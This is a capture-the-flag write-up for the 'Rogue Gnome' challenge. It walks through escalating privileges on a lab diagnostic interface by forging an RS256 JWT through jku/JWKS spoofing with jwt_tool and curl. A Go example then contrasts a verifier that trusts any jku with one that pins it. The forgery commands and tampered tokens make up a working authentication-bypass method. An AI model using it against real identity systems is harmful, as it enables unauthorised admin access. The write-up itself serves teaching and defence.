Rogue Gnome
Hike over to Paul in the park for a gnomey authentication puzzle adventure. What malicious firmware image are the gnomes downloading?
Challenge

Hey - I’m Paul. I’ve been at Counter Hack since 2024 and love pentesting web, API, and mobile apps. When I’m not hacking, I’m into board games, hiking, or paddle boarding.
I’m excited about privilege escalation - and that’s your job here. I have a low-privilege account for a Gnome Diagnostic Interface at gnome-48371.atnascorp (creds: gnome:SittingOnAShelf). The gnomes are getting suspicious updates and I need admin access to see what’s happening.
Task: Find a way to escalate privileges and gain admin access to the diagnostic interface.

Solution

First, let's take another look at the notes:

Hi, Paul here. Welcome to my web-server. I've been using it for JWT analysis.
I've discovered the Gnomes have a diagnostic interface that authenticates to an Atnas identity provider.
Unfortunately the gnome:SittingOnAShelf credentials discovered in 2015 don't have sufficient access to view the gnome diagnostic interface.
I've kept some notes in ~/notes
Can you help me gain access to the Gnome diagnostic interface and discover the name of the file the Gnome downloaded? When you identify the filename, enter it in the badge.

Let's go through the individual steps in the notes. First, we log in with the simple credentials and receive a JWT token, which we analyze:

paul@paulweb:~$ curl -X POST --data-binary $'username=gnome&password=SittingOnAShelf&return_uri=http%3A%2F%2Fgnome-48371.atnascorp%2Fauth' http://idp.atnascorp/login
paul@paulweb:~$ jwt_tool.py eyJhbGciOiJSUzI1NiIsImprdSI6Imh0dHA6Ly9pZHAuYXRuYXNjb3JwLy53ZWxsLWtub3duL2p3a3MuanNvbiIsImtpZCI6ImlkcC1rZXktMjAyNSIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJnbm9tZSIsImlhdCI6MTc2MjgxMDQwOSwiZXhwIjoxNzYyODE3NjA5LCJpc3MiOiJodHRwOi8vaWRwLmF0bmFzY29ycC8iLCJhZG1pbiI6ZmFsc2V9.C1VofCsWUGqwTvDqHq8702GY7KjH_S9KE62blYK_JKepPGsOknTWcqgnG2msNRfdQfNKh0NOplAEm4gHkCRO77qL9RykTeDI7EzkcdgP5c4wIUwTrndK4bTKmIfKMER_5gB6gfosi0wdVD5kSldcGGEuIojavl5YFByd6NDfaaDrx8OKrNvwfCgaC09LdRLrrPafGz2Ero6rwLEbteiiz6FthRccQvfKa9Q1l6WIbry4Zf96elYOtYX2JjNRKhK5fB8vFKThjzGIWJUTMzhHtw8V4KSRSO3NbdpQS5um-zX4mql0a3LV5DT_sDy7FH9G07zC-xlXXlhmkeyeQ85GgQ

...
[+] jku = "http://idp.atnascorp/.well-known/jwks.json"
...
[+] admin = False

We see that the JWT is RS256-signed and carries a jku header pointing at the identity provider's JWKS, so the verifier fetches its public key from whatever URL the token names. Let's try a JWKS spoofing attack: host our own key set on our web server and point the jku at it.

paul@paulweb:~$ cp .jwt_tool/jwttool_custom_jwks.json www/jwks.json
paul@paulweb:~$ vim www/jwks.json # change "kid":"idp-key-2025"

Next, we use jwt_tool to re-sign the token with our own key (-X s), set the jku header to our hosted jwks.json (-ju), and tamper with the payload (-T) to change the admin claim:

paul@paulweb:~$ jwt_tool.py eyJhbGciOiJSUzI1NiIsImprdSI6Imh0dHA6Ly9pZHAuYXRuYXNjb3JwLy53ZWxsLWtub3duL2p3a3MuanNvbiIsImtpZCI6ImlkcC1rZXktMjAyNSIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJnbm9tZSIsImlhdCI6MTc2MjgxMDQwOSwiZXhwIjoxNzYyODE3NjA5LCJpc3MiOiJodHRwOi8vaWRwLmF0bmFzY29ycC8iLCJhZG1pbiI6ZmFsc2V9.C1VofCsWUGqwTvDqHq8702GY7KjH_S9KE62blYK_JKepPGsOknTWcqgnG2msNRfdQfNKh0NOplAEm4gHkCRO77qL9RykTeDI7EzkcdgP5c4wIUwTrndK4bTKmIfKMER_5gB6gfosi0wdVD5kSldcGGEuIojavl5YFByd6NDfaaDrx8OKrNvwfCgaC09LdRLrrPafGz2Ero6rwLEbteiiz6FthRccQvfKa9Q1l6WIbry4Zf96elYOtYX2JjNRKhK5fB8vFKThjzGIWJUTMzhHtw8V4KSRSO3NbdpQS5um-zX4mql0a3LV5DT_sDy7FH9G07zC-xlXXlhmkeyeQ85GgQ -X s -ju http://paulweb.neighborhood/jwks.json -T

Token payload values:
[5] admin = False
...
Please enter new value and hit ENTER
> True

We send the re-signed token to the auth endpoint, which accepts it and issues an admin session cookie; with that cookie we can read the diagnostic interface:

paul@paulweb:~$ curl -v http://gnome-48371.atnascorp/auth?token=eyJhbGciOiJSUzI1NiIsImprdSI6Imh0dHA6Ly9wYXVsd2ViLm5laWdoYm9yaG9vZC9qd2tzLmpzb24iLCJraWQiOiJpZHAta2V5LTIwMjUiLCJ0eXAiOiJKV1QifQ.eyJzdWIiOiJnbm9tZSIsImlhdCI6MTc2MjgxMDQwOSwiZXhwIjoxNzYyODE3NjA5LCJpc3MiOiJodHRwOi8vaWRwLmF0bmFzY29ycC8iLCJhZG1pbiI6dHJ1ZX0.QDsK2ZZKc07hUNjeRcW49YFt18nNHyyKn4YIps9Gl0fjTNmWWmdjI7IY75wgZjqRrW91lFCuhCxcN027CHhtUnE7srby91gDXYMqGGyCeL0JpzJfw7b0rRnpTLj7UgUqTeq4NwEkkYManOsZZIQbGvmGd4MqhlTVJzHac7uSfx2OtkgMOPooSAC2VDVCW9zbX5ZkdJxt29gIupo-40KycAC3pySkxs8QmqdvdekvJVvQOZIcISODhSgEdgnPUV3DI84m39uZE5nCqD--d4ezJABy4NIbTMu4O46vpQQVW2-d2wbniL79Br3i7jOmUcnmvSYNOysy2DkNho1Nbv8dVw
paul@paulweb:~$ curl -H 'Cookie: session=eyJhZG1pbiI6dHJ1ZSwidXNlcm5hbWUiOiJnbm9tZSJ9.aRJbdw.w90200K9I4jxu2bYZoqksQGnpN8' http://gnome-48371.atnascorp/diagnostic-interface
...
2025-11-10 21:33:16: Checking for updates.
2025-11-10 21:33:16: Firmware Update available: refrigeration-botnet.bin
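The forgery worked because the diagnostic interface's verifier fetched whatever key set the token's own jku header named. As an added illustration, not code from the challenge, from jwt_tool or from the Atnas IdP, here is a small Go verifier that reproduces both behaviours: a permissive policy that trusts any jku (and so accepts the re-signed admin=true token) and a strict policy that only fetches keys from the IdP's pinned URL and then still checks the RS256 signature against that key. The RSA keys, the in-memory "network" map and the claims are constructed for the example; the URLs and kid are the ones seen in the write-up; decoding JWK n/e values is left out for brevity.

```go
package main

import (
	"crypto"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"encoding/base64"
	"encoding/json"
	"errors"
	"fmt"
	"strings"
)

// keySet maps kid -> public key: what a parsed jwks.json boils down to
// (JWK n/e decoding is left out to keep the example short).
type keySet map[string]*rsa.PublicKey

var enc = base64.RawURLEncoding

// signRS256 mints a token whose header names any jku/kid, just as the IdP
// (or jwt_tool in spoof mode) would.
func signRS256(priv *rsa.PrivateKey, jku, kid string, claims map[string]any) string {
	hdr, _ := json.Marshal(map[string]string{"alg": "RS256", "typ": "JWT", "jku": jku, "kid": kid})
	body, _ := json.Marshal(claims)
	input := enc.EncodeToString(hdr) + "." + enc.EncodeToString(body)
	h := sha256.Sum256([]byte(input))
	sig, _ := rsa.SignPKCS1v15(rand.Reader, priv, crypto.SHA256, h[:])
	return input + "." + enc.EncodeToString(sig)
}

// verify enforces three things: the jku must satisfy trustedJKU, the kid must exist
// in that key set, and the RS256 signature must validate. fetch stands in for the
// HTTP GET of the jku. A trustedJKU that accepts any URL reproduces the challenge's flaw.
func verify(token string, trustedJKU func(string) bool, fetch map[string]keySet) (map[string]any, error) {
	parts := strings.Split(token, ".")
	if len(parts) != 3 {
		return nil, errors.New("malformed token")
	}
	hdrBytes, e1 := enc.DecodeString(parts[0])
	body, e2 := enc.DecodeString(parts[1])
	sig, e3 := enc.DecodeString(parts[2])
	if e1 != nil || e2 != nil || e3 != nil {
		return nil, errors.New("bad base64url")
	}
	var hdr map[string]string
	if err := json.Unmarshal(hdrBytes, &hdr); err != nil || hdr["alg"] != "RS256" {
		return nil, errors.New("bad header or unexpected alg")
	}
	// The fix: never fetch keys from a URL the verifier does not already trust.
	if !trustedJKU(hdr["jku"]) {
		return nil, fmt.Errorf("jku %q is not a trusted key set", hdr["jku"])
	}
	pub, ok := fetch[hdr["jku"]][hdr["kid"]]
	if !ok {
		return nil, fmt.Errorf("unknown kid %q", hdr["kid"])
	}
	h := sha256.Sum256([]byte(parts[0] + "." + parts[1]))
	if rsa.VerifyPKCS1v15(pub, crypto.SHA256, h[:], sig) != nil {
		return nil, errors.New("signature does not verify")
	}
	var claims map[string]any
	return claims, json.Unmarshal(body, &claims)
}

// ScenarioResult records how each verifier policy treats each token.
type ScenarioResult struct {
	LegitAdmin, NaiveAdmin         any  // admin claim accepted: IdP token (strict), spoofed token (permissive)
	SpoofRejected, RelabelRejected bool // strict policy rejects the spoofed token and a rogue-signed token naming the real jku
}

// RunScenario generates an IdP key and a rogue key (constructed here, not the
// challenge's real keys) and replays the write-up's forgery against both policies.
func RunScenario() (ScenarioResult, error) {
	const idpJWKS, rogueJWKS = "http://idp.atnascorp/.well-known/jwks.json", "http://paulweb.neighborhood/jwks.json"
	idpKey, e1 := rsa.GenerateKey(rand.Reader, 2048)
	rogueKey, e2 := rsa.GenerateKey(rand.Reader, 2048)
	if e1 != nil || e2 != nil {
		return ScenarioResult{}, errors.New("key generation failed")
	}
	net := map[string]keySet{ // the rogue key set reuses the real kid, as in the write-up
		idpJWKS:   {"idp-key-2025": &idpKey.PublicKey},
		rogueJWKS: {"idp-key-2025": &rogueKey.PublicKey},
	}
	legit := signRS256(idpKey, idpJWKS, "idp-key-2025", map[string]any{"sub": "gnome", "admin": false})
	spoof := signRS256(rogueKey, rogueJWKS, "idp-key-2025", map[string]any{"sub": "gnome", "admin": true})
	relabel := signRS256(rogueKey, idpJWKS, "idp-key-2025", map[string]any{"sub": "gnome", "admin": true})
	strict := func(u string) bool { return u == idpJWKS }
	trustAny := func(string) bool { return true }
	rejects := func(tok string) bool { _, err := verify(tok, strict, net); return err != nil }
	var r ScenarioResult
	c, err := verify(legit, strict, net)
	if err != nil {
		return r, err
	}
	r.LegitAdmin = c["admin"]
	if c, err = verify(spoof, trustAny, net); err == nil {
		r.NaiveAdmin = c["admin"]
	}
	r.SpoofRejected, r.RelabelRejected = rejects(spoof), rejects(relabel)
	return r, nil
}

func main() {
	r, err := RunScenario()
	fmt.Printf("%+v err=%v\n", r, err)
}
```

The third token (rogue key, but a jku naming the real IdP URL) is there to show that allowlisting the jku is only half of the fix: the verifier must still look the kid up in the trusted key set and check the signature, otherwise a header that merely claims the right origin would pass.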